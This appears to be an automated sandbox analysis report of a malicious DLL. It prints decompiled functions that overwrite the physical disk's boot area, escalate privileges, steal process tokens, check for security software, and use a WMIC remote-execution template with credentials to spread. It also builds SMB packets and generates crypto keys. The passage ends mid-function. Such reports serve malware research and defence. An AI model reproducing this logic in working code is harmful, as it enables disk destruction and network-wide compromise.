    0x011e995c
    0x011e995c
    0x011e9968
    0x011e996e
    0x011e996e
    0x011e98fb
    0x011e9984

    APIs
      • Part of subcall function 011E8B70: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E8B80
    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 011E98D8
    • PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 011E98EC
    • PathFileExistsW.SHLWAPI ref: 011E98F3
    • wsprintfW.USER32 ref: 011E9913
    • wsprintfW.USER32 ref: 011E9927
      • Part of subcall function 011E6BB0: wsprintfW.USER32 ref: 011E6BD3
      • Part of subcall function 011E6BB0: EnterCriticalSection.KERNEL32(011FF124,00000000,00000114,76E6C426), ref: 011E6BFE
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,?), ref: 011E6C4C
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,011FB110), ref: 011E6C52
      • Part of subcall function 011E6BB0: SetLastError.KERNEL32(0000007A), ref: 011E6C5A
      • Part of subcall function 011E6BB0: LeaveCriticalSection.KERNEL32(011FF124), ref: 011E6C65
    • wsprintfW.USER32 ref: 011E9968
    • GetLastError.KERNEL32(?,00000104,?,00000001,00000000,?,011E9C21,?,?,?), ref: 011E9971
    Strings
    • wbem\wmic.exe, xrefs: 011E98E6
    • process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 , xrefs: 011E9921
    • %s /node:"%ws" /user:"%ws" /password:"%ws" , xrefs: 011E990D
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1C7F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 77
    APIs
    • CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,F0000000,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,011E1D54,F0000000,?), ref: 011E1CA6
    • LocalAlloc.KERNEL32(00000040,?,?,011E1D54,F0000000,?), ref: 011E1CB1
    • CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,?,011E1D54,F0000000,?), ref: 011E1CCC
    • CryptBinaryToStringW.CRYPT32(011E1D54,?,00000001,00000000,F0000000,?,011E1D54,F0000000,?), ref: 011E1CE8
    • LocalAlloc.KERNEL32(00000040,F0000000,?,011E1D54,F0000000,?), ref: 011E1CF6
    • CryptBinaryToStringW.CRYPT32(011E1D54,?,00000001,00000000,F0000000,?,011E1D54,F0000000,?), ref: 011E1D0F
    • LocalFree.KERNEL32(00000000,?,011E1D54,F0000000,?), ref: 011E1D1B
    • LocalFree.KERNEL32(011E1D54,?,011E1D54,F0000000,?), ref: 011E1D24
    Strings
    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011E1C85
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E8CBF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 70
    C-Code - Quality: 100%
    			E011E8CBF() {
				long _v8;
				void* _v12;
				signed int _v16;
				void _v36;
				void* _t16;
				void* _t28;

				_t28 = CreateFileA("\\\\.\\PhysicalDrive0", 0x40000000, 3, 0, 3, 0, 0);
				if(_t28 != 0) {
					DeviceIoControl(_t28, 0x70000, 0, 0,  &_v36, 0x18,  &_v8, 0);
					_t16 = LocalAlloc(0, _v16 * 0xa);
					_v12 = _t16;
					if(_t16 != 0) {
						DeviceIoControl(_t28, 0x90020, 0, 0, 0, 0,  &_v8, 0);
						WriteFile(_t28, _v12, _v16 * 0xa,  &_v8, 0);
						LocalFree(_v12);
					}
					CloseHandle(_t28);
					return 1;
				}
				return 0;
			}









    0x011e8ce1
    0x011e8ce5
    0x011e8d04
    0x011e8d0e
    0x011e8d14
    0x011e8d19
    0x011e8d2a
    0x011e8d3c
    0x011e8d45
    0x011e8d45
    0x011e8d4c
    0x00000000
    0x011e8d54
    0x00000000

    APIs
    • CreateFileA.KERNEL32(\\.\PhysicalDrive0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 011E8CDB
    • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 011E8D04
    • LocalAlloc.KERNEL32(00000000,011E8DFD,?,?,?,?,?,?,?,011E8DFD), ref: 011E8D0E
    • DeviceIoControl.KERNEL32(00000000,00090020,00000000,00000000,00000000,00000000,?,00000000), ref: 011E8D2A
    • WriteFile.KERNEL32(00000000,?,011E8DFD,?,00000000), ref: 011E8D3C
    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,011E8DFD), ref: 011E8D45
    • CloseHandle.KERNEL32(00000000), ref: 011E8D4C
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E81BA, Relevance: 9.1, APIs: 6, Instructions: 55
    C-Code - Quality: 77%
    			E011E81BA(WCHAR* _a4) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				long _t23;
				int _t24;

				_v28.PrivilegeCount = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = 0;
				_v12 = 0;
				_v8 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) != 0 && LookupPrivilegeValueW(0, _a4,  &(_v28.Privileges)) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					_t24 = AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0, 0);
					_t23 = GetLastError();
					_v12 = _t23;
					if(_t23 != 0) {
						_t24 = 0;
					}
				}
				SetLastError(_v12);
				return _t24;
			}









    0x011e81c7
    0x011e81cd
    0x011e81ce
    0x011e81cf
    0x011e81d6
    0x011e81d8
    0x011e81db
    0x011e81ed
    0x011e820c
    0x011e8213
    0x011e8220
    0x011e8222
    0x011e8228
    0x011e822d
    0x011e822f
    0x011e822f
    0x011e822d
    0x011e8234
    0x011e8240

    APIs
    • GetCurrentProcess.KERNEL32(00000028,?,?,00000000), ref: 011E81DE
    • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 011E81E5
    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 011E81F7
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 011E821A
    • GetLastError.KERNEL32(?,00000000), ref: 011E8222
    • SetLastError.KERNEL32(?,?,00000000), ref: 011E8234
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E8677, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72
    C-Code - Quality: 100%
    			E011E8677() {
				signed int _v8;
				intOrPtr _v12;
				void* _v16;
				char _v536;
				void* _v572;
				void* _t26;
				struct tagPROCESSENTRY32W* _t28;
				intOrPtr* _t30;
				signed int _t37;
				signed int _t41;
				intOrPtr _t43;
				signed int* _t44;
				void* _t45;
				signed int _t46;
				signed int _t48;
				signed int _t51;
				void* _t53;

				_v8 = _v8 | 0xffffffff;
				_t26 = CreateToolhelp32Snapshot(2, 0);
				_v16 = _t26;
				if(_t26 == 0xffffffff) {
					L18:
					return _v8;
				}
				_t28 =  &_v572;
				_v572 = 0x22c;
				Process32FirstW(_v16, _t28);
				if(_t28 == 0) {
					L17:
					CloseHandle(_v16);
					goto L18;
				}
				do {
					_t30 =  &_v536;
					_v12 = 0x12345678;
					_t41 = 0;
					_t45 = _t30 + 2;
					do {
						_t43 =  *_t30;
						_t30 = _t30 + 2;
					} while (_t43 != 0);
					_t48 = _t30 - _t45 >> 1;
					do {
						_t46 = 0;
						if(_t48 == 0) {
							goto L9;
						}
						_t51 = _t41;
						do {
							_t44 = _t53 + (_t51 & 0x00000003) - 8;
							_t37 = ( *(_t53 + _t46 * 2 - 0x214) ^  *_t44) - 1;
							_t46 = _t46 + 1;
							_t51 = _t51 + 1;
							 *_t44 = _t37;
						} while (_t46 < _t48);
						L9:
						_t41 = _t41 + 1;
					} while (_t41 < 3);
					if(_v12 == 0x2e214b44) {
						_v8 = _v8 & 0xfffffff7;
					} else {
						if(_v12 == 0x6403527e || _v12 == 0x651b3005) {
							_v8 = _v8 & 0xfffffffb;
						}
					}
				} while (Process32NextW(_v16,  &_v572) != 0);
				goto L17;
			}




















    0x011e8680
    0x011e8688
    0x011e868e
    0x011e8694
    0x011e8755
    0x011e8759
    0x011e8759
    0x011e869a
    0x011e86a4
    0x011e86ae
    0x011e86b6
    0x011e874c
    0x011e874f
    0x00000000
    0x011e874f
    0x011e86bf
    0x011e86bf
    0x011e86c5
    0x011e86cc
    0x011e86ce
    0x011e86d1
    0x011e86d1
    0x011e86d4
    0x011e86d7
    0x011e86e0
    0x011e86e2
    0x011e86e2
    0x011e86e6
    0x00000000
    0x00000000
    0x011e86e8
    0x011e86ea
    0x011e86ef
    0x011e86fc
    0x011e86fe
    0x011e86ff
    0x011e8700
    0x011e8702
    0x011e8706
    0x011e8706
    0x011e8707
    0x011e8713
    0x011e872d
    0x011e8715
    0x011e871c
    0x011e8727
    0x011e8727
    0x011e871c
    0x011e8741
    0x00000000

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011E8688
    • Process32FirstW.KERNEL32(?,?), ref: 011E86AE
    • Process32NextW.KERNEL32(?,0000022C), ref: 011E873B
    • CloseHandle.KERNEL32(?), ref: 011E874F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1B4E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
    APIs
    • CryptGenKey.ADVAPI32(?,0000660E,00000001,?,?,Microsoft Enhanced RSA and AES Cryptographic Provider), ref: 011E1B66
    • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,F0000000), ref: 011E1B87
    • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 011E1B96
    Strings
    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011E1B54
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E2466, Relevance: 1.5, APIs: 1, Instructions: 33
    C-Code - Quality: 37%
    			E011E2466(intOrPtr _a4, char _a8, short _a12, short _a16, short _a20, short _a24, short _a28, short _a32) {
				void* _t19;
				short _t21;
				void* _t30;

				_t19 = E011E1000(0x24);
				_t30 = _t19;
				if(_t30 != 0) {
					_t21 = _a4 + 0xfffffffc;
					__imp__#9(_t21);
					 *((short*)(_t30 + 2)) = _t21;
					 *((char*)(_t30 + 8)) = _a8;
					 *((short*)(_t30 + 0xe)) = _a12;
					 *((short*)(_t30 + 0x10)) = _a16;
					 *((short*)(_t30 + 0x1c)) = _a20;
					 *((short*)(_t30 + 0x1e)) = _a24;
					 *((short*)(_t30 + 0x20)) = _a28;
					 *((short*)(_t30 + 0x22)) = _a32;
					 *((intOrPtr*)(_t30 + 4)) = 0x424d53ff;
					 *((char*)(_t30 + 0xd)) = 0x18;
					return _t30;
				}
				return _t19;
			}






    0x011e246c
    0x011e2471
    0x011e2475
    0x011e247a
    0x011e247e
    0x011e2484
    0x011e248b
    0x011e2492
    0x011e249a
    0x011e24a2
    0x011e24aa
    0x011e24b2
    0x011e24ba
    0x011e24be
    0x011e24c5
    0x00000000
    0x011e24c9
    0x011e24cd

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • htons.WS2_32(-000000FC), ref: 011E247E
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E875A, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 147
    C-Code - Quality: 100%
    			E011E875A(void* __eflags, long _a4, void _a8, void* _a12, long _a16, void _a20, int _a24, intOrPtr _a36, void* _a88, struct tagPROCESSENTRY32W _a92, long _a96, char _a648, int _a656, void _a660) {
				void* _v0;
				void* _v4;
				void _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				void* _t62;
				void* _t68;
				signed int _t84;
				signed int _t88;
				intOrPtr _t102;
				signed int _t106;
				void* _t108;

				E011EA4F0(0x1294);
				_a8 = 0;
				_a24 = 0;
				_a656 = 0;
				memset( &_a660, 0, 0xffc);
				_t108 = (_t106 & 0xfffffff8) + 0xc;
				_v0 = 0;
				_a36 = E011E8494();
				_t62 = CreateToolhelp32Snapshot(2, 0);
				_a16 = _t62;
				if(_t62 == 0xffffffff) {
					L21:
					return _a4;
				}
				_a92 = 0x22c;
				Process32FirstW(_t62,  &_a92);
				if(_t62 == 0) {
					GetLastError();
					L20:
					CloseHandle(_a12);
					goto L21;
				}
				_a24 = _a4 -  &_a648;
				do {
					_a8 = _a8 | 0xffffffff;
					_v4 = 0;
					_a4 = 0;
					_t68 = OpenProcess(0x450, 0, _a96);
					_a20 = _t68;
					if(_t68 == 0) {
						L16:
						if(_v0 >= 0x40) {
							goto L20;
						}
						goto L17;
					}
					if(OpenProcessToken(_t68, 0x2000000,  &_v4) == 0 || GetTokenInformation(_v4, 0xc,  &_a8, 4,  &_a16) == 0 || _a24 != 0 && _a4 == 0 || DuplicateTokenEx(_v8, 0x2000000, 0, 2, 2,  &_v0) == 0) {
						L15:
						CloseHandle(_v4);
						CloseHandle(_a20);
						goto L16;
					} else {
						memset( &_a20, 0, 0x38);
						_t108 = _t108 + 0xc;
						if(GetTokenInformation(_v8, 0xa,  &_a20, 0x38,  &_a4) == 0) {
							goto L15;
						}
						_t102 = _a24;
						_t84 = 0;
						if(_v24 <= 0) {
							L13:
							if(SetTokenInformation(_v12, 0xc,  &_v8, 4) != 0) {
								_t88 = _v28 << 2;
								_v20 = _v20 + 1;
								_v28 = _v28 + 1;
								 *((intOrPtr*)(_t108 + _a4 + _t88 + 0x2a0)) = _v16;
								 *((intOrPtr*)(_t108 + _t88 + 0x2a0)) = _t102;
							}
							goto L15;
						}
						while( *((intOrPtr*)(_t108 + 0x2a0 + _t84 * 4)) != _t102) {
							_t84 = _t84 + 1;
							if(_t84 < _v24) {
								continue;
							}
							goto L13;
						}
						goto L15;
					}
					L17:
				} while (Process32NextW(_a12,  &_a88) != 0);
				goto L20;
			}


















    0x011e8765
    0x011e877d
    0x011e8781
    0x011e8785
    0x011e878c
    0x011e8791
    0x011e8794
    0x011e87a0
    0x011e87a4
    0x011e87aa
    0x011e87b1
    0x011e8939
    0x011e8943
    0x011e8943
    0x011e87bd
    0x011e87c5
    0x011e87cd
    0x011e8929
    0x011e892f
    0x011e8933
    0x00000000
    0x011e8933
    0x011e87df
    0x011e87e8
    0x011e87ec
    0x011e87f7
    0x011e87fb
    0x011e87ff
    0x011e8805
    0x011e880b
    0x011e8909
    0x011e890e
    0x00000000
    0x00000000
    0x00000000
    0x011e890e
    0x011e8820
    0x011e88f7
    0x011e8901
    0x011e8907
    0x00000000
    0x011e8875
    0x011e887d
    0x011e8882
    0x011e889b
    0x00000000
    0x00000000
    0x011e889d
    0x011e88a1
    0x011e88a7
    0x011e88b9
    0x011e88ce
    0x011e88dc
    0x011e88e1
    0x011e88e5
    0x011e88e9
    0x011e88f0
    0x011e88f0
    0x00000000
    0x011e88ce
    0x011e88a9
    0x011e88b2
    0x011e88b7
    0x00000000
    0x00000000
    0x00000000
    0x011e88b7
    0x00000000
    0x011e88a9
    0x011e8910
    0x011e891f
    0x00000000

    APIs
    • memset.MSVCRT ref: 011E878C
      • Part of subcall function 011E8494: memset.MSVCRT ref: 011E84AD
      • Part of subcall function 011E8494: GetVersionExW.KERNEL32(?,?,?,00000000), ref: 011E84C6
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011E87A4
    • Process32FirstW.KERNEL32 ref: 011E87C5
    • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 011E87FF
    • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 011E8818
    • GetTokenInformation.ADVAPI32(000000FF,0000000C,?,00000004,?), ref: 011E883E
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 011E8867
    • memset.MSVCRT ref: 011E887D
    • GetTokenInformation.ADVAPI32(?,0000000A,?,00000038,?,?,00000000,?), ref: 011E8897
    • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 011E88C6
    • CloseHandle.KERNEL32(?), ref: 011E8901
    • CloseHandle.KERNEL32(?), ref: 011E8907
    • Process32NextW.KERNEL32(?,?), ref: 011E8919
    • GetLastError.KERNEL32 ref: 011E8929
    • CloseHandle.KERNEL32(?), ref: 011E8933
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E7CC0, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 96
    C-Code - Quality: 96%
    			E011E7CC0() {
				long _v8;
				void* _v12;
				long _v16;
				long _t10;
				void* _t16;
				void* _t27;
				signed int _t33;
				long _t36;
				void* _t44;

				_t33 = 0;
				_t44 =  *0x11ff114 - _t33; // 0x1
				if(_t44 != 0) {
					L9:
					return _t10;
				} else {
					 *0x11ff118 = GetTickCount();
					if(E011E81BA(L"SeShutdownPrivilege") != 0) {
						_t33 = 1;
					}
					if(E011E81BA(L"SeDebugPrivilege") != 0) {
						_t33 = _t33 | 0x00000002;
					}
					if(E011E81BA(L"SeTcbPrivilege") != 0) {
						_t33 = _t33 | 0x00000004;
					}
					 *0x11ff144 = _t33;
					 *0x11ff104 = E011E8677();
					_t10 = GetModuleFileNameW( *0x11ff120, "C:\Users\luketaylor\Desktop\abc.dll", 0x30c);
					if(_t10 == 0) {
						goto L9;
					} else {
						_pop(_t35);
						_v16 = 0;
						_t16 = CreateFileW("C:\Users\luketaylor\Desktop\abc.dll", 0x80000000, 1, 0, 3, 0, 0);
						_v12 = _t16;
						if(_t16 != 0xffffffff) {
							_t36 = GetFileSize(_t16, 0);
							if(_t36 != 0) {
								_t27 = HeapAlloc(GetProcessHeap(), 0, _t36);
								if(_t27 != 0) {
									_v8 = 0;
									if(ReadFile(_v12, _t27, _t36,  &_v8, 0) != 0 || _v8 != _t36) {
										 *0x11ff0fc = _t27;
										 *0x11ff11c = _t36;
										_v16 = 1;
									} else {
										HeapFree(GetProcessHeap(), 0, _t27);
									}
								}
							}
							CloseHandle(_v12);
						}
						return _v16;
					}
				}
			}












    0x011e7cc1
    0x011e7cc3
    0x011e7cc9
    0x011e7d37
    0x011e7d38
    0x011e7ccb
    0x011e7cd6
    0x011e7ce2
    0x011e7ce4
    0x011e7ce4
    0x011e7cf1
    0x011e7cf3
    0x011e7cf3
    0x011e7d02
    0x011e7d04
    0x011e7d04
    0x011e7d07
    0x011e7d22
    0x011e7d27
    0x011e7d2f
    0x00000000
    0x011e7d31
    0x011e7d31
    0x011e8ae9
    0x011e8aec
    0x011e8af2
    0x011e8af8
    0x011e8b03
    0x011e8b07
    0x011e8b19
    0x011e8b1d
    0x011e8b29
    0x011e8b34
    0x011e8b4c
    0x011e8b52
    0x011e8b58
    0x011e8b3b
    0x011e8b44
    0x011e8b44
    0x011e8b34
    0x011e8b5f
    0x011e8b63
    0x011e8b69
    0x011e8b6f
    0x011e8b6f
    0x011e7d2f

    APIs
    • GetTickCount.KERNEL32(?,011E7E00), ref: 011E7CCB
      • Part of subcall function 011E81BA: GetCurrentProcess.KERNEL32(00000028,?,?,00000000), ref: 011E81DE
      • Part of subcall function 011E81BA: OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 011E81E5
      • Part of subcall function 011E81BA: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 011E81F7
      • Part of subcall function 011E81BA: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 011E821A
      • Part of subcall function 011E81BA: GetLastError.KERNEL32(?,00000000), ref: 011E8222
      • Part of subcall function 011E81BA: SetLastError.KERNEL32(?,?,00000000), ref: 011E8234
      • Part of subcall function 011E8677: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011E8688
      • Part of subcall function 011E8677: Process32FirstW.KERNEL32(?,?), ref: 011E86AE
      • Part of subcall function 011E8677: Process32NextW.KERNEL32(?,0000022C), ref: 011E873B
      • Part of subcall function 011E8677: CloseHandle.KERNEL32(?), ref: 011E874F
    • GetModuleFileNameW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,0000030C,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,011E7E00), ref: 011E7D27
    • CreateFileW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011E8AEC
    • GetFileSize.KERNEL32(00000000,00000000), ref: 011E8AFD
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E8B0C
    • HeapAlloc.KERNEL32(00000000), ref: 011E8B13
    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 011E8B2C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E8B3D
    • HeapFree.KERNEL32(00000000), ref: 011E8B44
    • CloseHandle.KERNEL32(?), ref: 011E8B63
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E8BC6, Relevance: 19.6, APIs: 13, Instructions: 91
    C-Code - Quality: 100%
    			E011E8BC6() {
				long _v8;
				void* _v12;
				void* _v16;
				char* _t31;
				DWORD* _t32;
				long _t33;
				void* _t37;
				void* _t39;
				void** _t43;

				_v16 = 0;
				_v12 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20008, 1,  &_v12) == 0) {
					GetLastError();
					L23:
					return _v16;
				}
				_v8 = 0;
				if(GetTokenInformation(_v12, 2, 0, 0,  &_v8) != 0) {
					L21:
					CloseHandle(_v12);
					goto L23;
				}
				if(GetLastError() != 0x7a) {
					L20:
					goto L21;
				}
				_t39 = GlobalAlloc(0x40, _v8);
				if(_t39 == 0) {
					GetLastError();
					L19:
					goto L20;
				}
				if(GetTokenInformation(_v12, 2, _t39, _v8,  &_v8) == 0) {
					GetLastError();
					L17:
					GlobalFree(_t39);
					goto L19;
				}
				_t37 = 0;
				if( *_t39 > 0) {
					_t11 = _t39 + 4; // 0x4
					_t43 = _t11;
					while(_v16 == 0) {
						_t31 = GetSidSubAuthorityCount( *_t43);
						if(_t31 != 0 &&  *_t31 >= 4) {
							_t32 = GetSidSubAuthority( *_t43, 4);
							if(_t32 != 0) {
								_t33 =  *_t32;
								if(_t33 == 0x200 || _t33 == 0x207) {
									_v16 = 1;
								}
							}
						}
						_t37 = _t37 + 1;
						_t43 =  &(_t43[2]);
						if(_t37 <  *_t39) {
							continue;
						} else {
							goto L17;
						}
					}
				}
			}












    0x011e8bda
    0x011e8bdd
    0x011e8bef
    0x011e8cb3
    0x011e8cb9
    0x011e8cbe
    0x011e8cbe
    0x011e8c00
    0x011e8c0d
    0x011e8ca8
    0x011e8cab
    0x00000000
    0x011e8cab
    0x011e8c1f
    0x011e8ca7
    0x00000000
    0x011e8ca7
    0x011e8c31
    0x011e8c35
    0x011e8ca4
    0x011e8ca6
    0x00000000
    0x011e8ca6
    0x011e8c48
    0x011e8c99
    0x011e8c9b
    0x011e8c9c
    0x00000000
    0x011e8c9c
    0x011e8c4a
    0x011e8c4e
    0x011e8c50
    0x011e8c50
    0x011e8c53
    0x011e8c5b
    0x011e8c63
    0x011e8c6e
    0x011e8c76
    0x011e8c78
    0x011e8c7f
    0x011e8c88
    0x011e8c88
    0x011e8c7f
    0x011e8c76
    0x011e8c8f
    0x011e8c90
    0x011e8c95
    0x00000000
    0x011e8c97
    0x00000000
    0x011e8c97
    0x011e8c95
    0x011e8c53

    APIs
    • GetCurrentThread.KERNEL32(00020008,00000001,?), ref: 011E8BE0
    • OpenThreadToken.ADVAPI32(00000000), ref: 011E8BE7
    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 011E8C09
    • GetLastError.KERNEL32 ref: 011E8C1A
    • GlobalAlloc.KERNEL32(00000040,?), ref: 011E8C2B
    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 011E8C44
    • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 011E8C5B
    • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 011E8C6E
    • GetLastError.KERNEL32 ref: 011E8C99
    • GlobalFree.KERNEL32(00000000), ref: 011E8C9C
    • GetLastError.KERNEL32 ref: 011E8CA4
    • CloseHandle.KERNEL32(?), ref: 011E8CAB
    • GetLastError.KERNEL32 ref: 011E8CB3
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E908A, Relevance: 16.6, APIs: 11, Instructions: 130
    C-Code - Quality: 17%
    			E011E908A(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				char _v20;
				signed int _v24;
				long _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v584;
				void* __esi;
				char* _t58;
				intOrPtr _t61;
				intOrPtr _t64;
				intOrPtr _t71;
				intOrPtr _t73;
				signed int _t83;
				intOrPtr* _t85;
				void* _t86;
				signed int _t88;
				intOrPtr* _t89;

				_t83 = 0;
				_t88 = 0;
				_v48 = 0;
				_v44 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_v28 = 0;
				_v24 = 0;
				_v32 = 0;
				_v40 = 0;
				_v36 = 0;
				_v64 = 0;
				_v56 = 0x104;
